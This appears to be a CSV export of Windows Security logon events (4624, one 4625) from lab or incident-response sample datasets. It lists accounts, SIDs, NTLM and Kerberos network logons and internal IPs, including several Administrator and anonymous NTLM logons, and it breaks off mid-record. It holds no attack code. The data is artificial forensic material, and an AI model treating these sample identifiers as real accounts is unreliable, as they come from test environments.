6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 72742 + + + + + Security + 02694w-win10.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + THREEBEESCO.COM + 0x8a38de + 3 + Kerberos + Kerberos + - + 35D5E180-95BD-9ED7-7EFE-C355D7215A87 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50163 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 72742 + + + + + Security + 02694w-win10.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + THREEBEESCO.COM + 0x8a38de + 3 + Kerberos + Kerberos + - + 35D5E180-95BD-9ED7-7EFE-C355D7215A87 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50163 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-03-18T15:06:29.911579+04:00,1552907189.911579,4624,user01,EXAMPLE,9,seclogo,::1,,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 432903 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x4530f0f + 9 + seclogo + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x3ec + C:\Windows\System32\svchost.exe + ::1 + 0 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563342 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x116c7b + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + ::1 + 55589 + %%1833 + +" +2019-03-19T02:16:09.458302+04:00,1552947369.458302,4624,user01,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563300 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x110085 + 3 + Kerberos + Kerberos + + 31E347DC-FF67-08B3-EADC-1EC267B1975B + - + - + 0 + 0x0 + - + 10.0.2.17 + 49249 + %%1833 + +" +2019-03-19T02:15:49.676748+04:00,1552947349.676748,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,PC01,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563297 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x10fc09 + 3 + NtLmSsp + NTLM + PC01 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 10.0.2.17 + 49249 + %%1833 + +" +2019-03-19T02:15:49.614293+04:00,1552947349.614293,4624,Administrator,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563294 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x10fbeb + 3 + Kerberos + Kerberos + + BAEC19DA-130D-80F0-BD26-78045EE64D62 + - + - + 0 + 0x0 + - + 10.0.2.17 + 49249 + %%1833 + +" +2019-03-19T02:15:49.598756+04:00,1552947349.598756,4624,Administrator,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563285 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x10fbcc + 3 + Kerberos + Kerberos + + BAEC19DA-130D-80F0-BD26-78045EE64D62 + - + - + 0 + 0x0 + - + 10.0.2.17 + 49244 + %%1833 + +" +2019-03-19T02:15:49.567435+04:00,1552947349.567435,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563265 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x10fac2 + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 55585 + %%1840 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982101 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x73b44c + 3 + Kerberos + Kerberos + - + E8C9AC4A-31FC-C37F-B4D7-B3217C608858 + - + - + 0 + 0x0 + - + ::1 + 64849 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.499428+04:00,1639331872.499428,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982097 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738cf9 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50616 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.375084+04:00,1639331872.375084,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982092 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738ce4 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50614 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.366793+04:00,1639331872.366793,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982089 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738afd + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50613 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.313673+04:00,1639331872.313673,4624,lgrove,THREEBEESCO.COM,3,Kerberos,172.16.66.19,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982084 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + THREEBEESCO.COM + 0x738ae4 + 3 + Kerberos + Kerberos + - + DCED4BA6-CF24-37EF-0627-B0E4EED7F565 + - + - + 0 + 0x0 + - + 172.16.66.19 + 50609 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566894 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x18423d + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 56034 + %%1840 + +" +2019-03-19T04:02:21.929554+04:00,1552953741.929554,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566889 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x184212 + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + ::1 + 56033 + %%1833 + +" +2019-03-19T04:02:04.319945+04:00,1552953724.319945,4624,Administrator,EXAMPLE,3,NtLmSsp,-,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566835 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2d2 + 3 + NtLmSsp + NTLM + + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + +" +2019-03-19T04:02:04.241919+04:00,1552953724.241919,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566830 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2c0 + 3 + NtLmSsp + NTLM + + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 10.0.2.17 + 49237 + %%1833 + +" +2019-03-19T04:02:04.226251+04:00,1552953724.226251,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566826 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2aa + 3 + NtLmSsp + 